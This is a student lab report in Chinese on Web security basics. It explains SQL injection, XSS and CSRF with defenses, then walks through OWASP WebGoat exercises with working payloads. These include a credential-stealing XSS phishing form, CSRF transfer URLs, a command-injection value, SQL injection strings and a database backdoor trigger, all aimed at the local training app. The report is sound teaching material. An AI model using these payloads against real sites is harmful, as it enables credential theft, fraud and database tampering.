20145222何志威《網絡對抗》- Web安全基礎實踐

20145322何志威《網絡對抗》Exp9 Web安全基礎實踐

基礎問題回答

一、SQL注入原理，如何防護

• SQL注入

• 就是經過把SQL命令插入到「Web表單遞交」或「輸入域名」或「頁面請求」的查詢字符串，最終達到欺騙服務器執行惡意的SQL命令。設計程序中忽略對可能構成攻擊的特殊字符串的檢查。後臺數據庫將其認做正常SQL指令後正常執行，可能實現對後臺數據庫進行各類操做，甚至形成破壞後臺數據庫等嚴重後果。

• 防護

• 經過正則表達式，或限制長度，對用戶的輸入進行校驗等。

• 不要使用管理員權限的數據庫鏈接，爲每一個應用使用單獨的權限有限的數據庫鏈接。

• 不把機密信息明文存放，請加密或者hash掉密碼和敏感的信息。

• 應用的異常信息應該給出儘量少的提示，最好使用自定義的錯誤信息對原始錯誤信息進行包裝，把異常信息存放在獨立的表中。

二、XSS攻擊的原理，如何防護

• 原理：在Web頁面裏插入惡意Script代碼，當用戶瀏覽網頁時，嵌入其中Web裏面的Script代碼會被執行，一個看似安全的網頁卻有可能盜取用戶的cookies，或者登陸名密碼等信息。

• 防護

• 在輸入方面對用戶提交的的內容進行可靠的輸入驗證。

• 能夠對輸入的地方進行輸入字數控制

• 腳本執行區，禁止輸入。

三、CSRF攻擊原理，如何防護

• 咱們知道XSS是跨站腳本攻擊，就是在用戶的瀏覽器中執行攻擊者的腳本，來得到其cookie等信息。而CSRF是借用用戶的身份，向web server發送請求，由於該請求不是用戶本意，因此稱爲「跨站請求僞造」。

• 對於CSRF的防護也能夠從如下幾個方面入手：

• 經過referer、token或者驗證碼來檢測用戶提交；

• 儘可能不要在頁面的連接中暴露用戶隱私信息，對於用戶修改刪除等操做最好都使用post操做；

• 避免全站通用的cookie，嚴格設置cookie的域。

WebGoat

• WebGoat是OWASP組織研製出的用於進行web漏洞實驗的應用平臺，用來講明web應用中存在的安全漏洞。WebGoat運行在帶有java虛擬機的平臺之上，目前提供的訓練課程有不少，包含了XSS、線程安全、SQL注入等，咱們本次的實驗就是在WebGoat平臺上進行。

• WebGoat分爲簡單版和開發板，簡單版是個Java的Jar包，只須要有Java環境便可，咱們在命令行裏執行：java -jar webgoat-container-7.0.1-war-exec.jar運行WebGoat

• WebGoat使用8080端口，因此在瀏覽器上訪問localhost:8080/WebGoat，進入WebGoat以後，能夠看到有不少題目來讓咱們進行練習。

Cross-Site Scripting（XSS）練習

Phishing with XSS

• 這個題目咱們要在搜索框中輸入XSS攻擊代碼，利用XSS能夠在已存在的頁面中進一步添加元素的特色。咱們先建立一個form，讓受害人在咱們建立的form中填寫用戶名和密碼，再添加一段JavaScript代碼，讀取受害人輸入的用戶名和密碼，而且將這些信息發送給http://localhost:8080/WebGoat/catcher?PROPERTY=yes...，完整的XSS攻擊代碼以下：

  </form>
    <script>
        function hack(){ 
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
    alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
        } 
    </script>
    <form name="phish">
    <br>
    <br>
    <HR>
        <H2>This feature requires account login:</H2>
    <br>
        <br>Enter Username:<br>
        <input type="text" name="user">
        <br>Enter Password:<br>
        <input type="password" name = "pass">
    <br>
        <input type="submit" name="login" value="login" onclick="hack()">
    </form>
    <br>
    <br>
    <HR>

• 在搜索框中輸入攻擊代碼後點擊搜索，會看到一個要求輸入用戶名密碼的表單，如圖所示：

• 輸入用戶名密碼，點擊登陸，WebGoat會將你輸入的信息捕獲並反饋給你：

• 攻擊成功！

Stored XSS Attacks

• 咱們的目標是要建立非法的消息內容，能夠致使其餘用戶訪問時載入非預期的頁面或內容，在上個實驗中咱們也作過，在message中輸入一串代碼<script>alert("20145322 attack succeed!");</script>

• 提交後，再次點擊剛剛建立的帖子，成功彈出窗口，說明攻擊成功：

Reflected XSS Attacks

• 當咱們輸入錯誤用戶信息後，服務器校驗輸入有誤，返回錯誤頁面並將錯誤內容展現給咱們看：

• 這時若是咱們將帶有攻擊性的URL做爲輸入源，例如依舊輸入<script>alert("5322 attack succeed!");</script>，就會彈出對話框：

• 雖然這個效果和上一個存儲型XSS實驗的效果相似，可是二者所用的原理不同，存儲型XSS是持久化的，代碼是存儲在服務器中，比較典型的例子就是上面所用的留言板，而這個實驗中用的是反射型XSS攻擊是非持久化的，應用的場景好比欺騙用戶本身去點擊連接才能觸發XSS代碼，也就是說它的代碼是不存在服務器中的，因此通常來講存儲型XSS攻擊危害更大。

Cross Site Request Forgery(CSRF)

• 咱們的目的是要寫一個URL誘使其餘用戶點擊，從而觸發CSRF攻擊，咱們能夠以圖片的的形式將URL放進Message框，這時的URL對其餘用戶是不可見的，用戶一旦點擊圖片，就會觸發一個CSRF事件。

• 咱們在message框中輸入這樣一串代碼：<img src="http://localhost:8080/WebGoat/attack?Screen=286&menu=900&transferFunds=4000"/>，注意這裏面的Screen和menu的值每一個人的電腦可能不同，能夠在Parameters進行查看

• 提交後，會在消息列表中看到一個新的消息，點擊該消息，當前頁面就會下載這個消息並顯示出來，轉走用戶的4000元，從而達到CSRF攻擊的目的。

CSRF Prompt By-Pass

• 咱們依舊和上一個同樣要構造CSRF攻擊，不過此次其包括了兩個請求，一是轉帳請求，二是確認轉帳成功請求，即須要額外傳遞兩個參數給服務器（transferFunds=4000，transferFunds=CONFIRM）

• 一開始我是直接在message中寫入了攻擊代碼，可是沒有成功，因而我換了一種方法，先在瀏覽器中手動輸入URL：localhost:8080/WebGoat/attack?Screen=269&menu=900&transferFunds=5000進入確認轉帳請求頁面：

• 以後看了一下網頁的源代碼，發現transferFunds的值變成了CONFIRM：

• 因而點擊了CONFIRM按鈕以後，再在瀏覽器中輸入URL：localhost:8080/WebGoat/attack?Screen=268&menu=900&transferFunds=CONFIRM，成功轉走了5000元：

Injection Flaws練習

Command Injection

• 這個題是要求可以在目標主機上執行系統命令，咱們能夠經過火狐瀏覽器下的一個擴展Firebug對源代碼進行修改，例如在BackDoors.help旁邊加上"& netstat -an & ipconfig"：

• 以後在下拉菜單中能看到咱們修改後的值：

• 選中修改後的值再點view，能夠看到命令被執行，出現系統網絡鏈接狀況：

Numeric SQL Injection

• 咱們要經過注入SQL字符串的方式查看全部的天氣數據，咱們上次實驗作過相似的，只要加上一個1=1這種永真式便可達到咱們的目的，依舊利用firebug，在任意一個值好比101旁邊加上or 1=1：

• 選中Columbia，點Go，能夠看到全部天氣數據：

Log Spoofing

• 咱們輸入的用戶名會被追加到日誌文件中，因此咱們可使用障眼法來使用戶名爲「admin」的用戶在日誌中顯示「成功登陸」，在User Name文本框中輸入rx%0d%0aLogin Succeeded for username: admin，其中%0d是回車，%0a是換行符：

• 如圖所示，攻擊成功：

String SQL Injection

• 仍是和以前同樣，基於select語句構造SQL注入字符串，在文本框中輸入' or 1=1 --：

• 點Go，攻擊成功，全部用戶信息都被顯示出來：

LAB:SQL Injection(Stage 1:String SQL Injection)

• 以用戶Neville登陸，在密碼欄中輸入' or 1=1 --進行SQL注入，可是登陸失敗：

登陸成功：

LAB:SQL Injection(Stage 3:Numeric SQL Injection)

• 咱們仍是用上一題的辦法先以用戶名Larry登陸，登陸以後看到瀏覽員工信息的按鈕是ViewProfile：

• 在網頁代碼中分析一下這個按鈕，發現這個地方是以員工ID做爲索引傳遞參數的，咱們要達到經過Larry來瀏覽老闆帳戶信息的目的，通常來講老闆的工資都應該是最高的，因此把其中的value值改成101 or 1=1 order by salary desc --，這樣老闆的信息就會被排到第一個：

• 以後就能夠查看到老闆的信息：

Database Backdoors

• 先輸一個101，獲得了該用戶的信息：

• 能夠發現輸入的語句沒有驗證，很容易進行SQL注入，輸入注入語句：101; update employee set salary=10000，成功把該用戶的工資更改成10000：

• 接下來使用語句101;CREATE TRIGGER lxmBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='20145322@163.com' WHERE userid = NEW.userid建立一個後門，把表中全部的郵箱和用戶ID都設爲個人：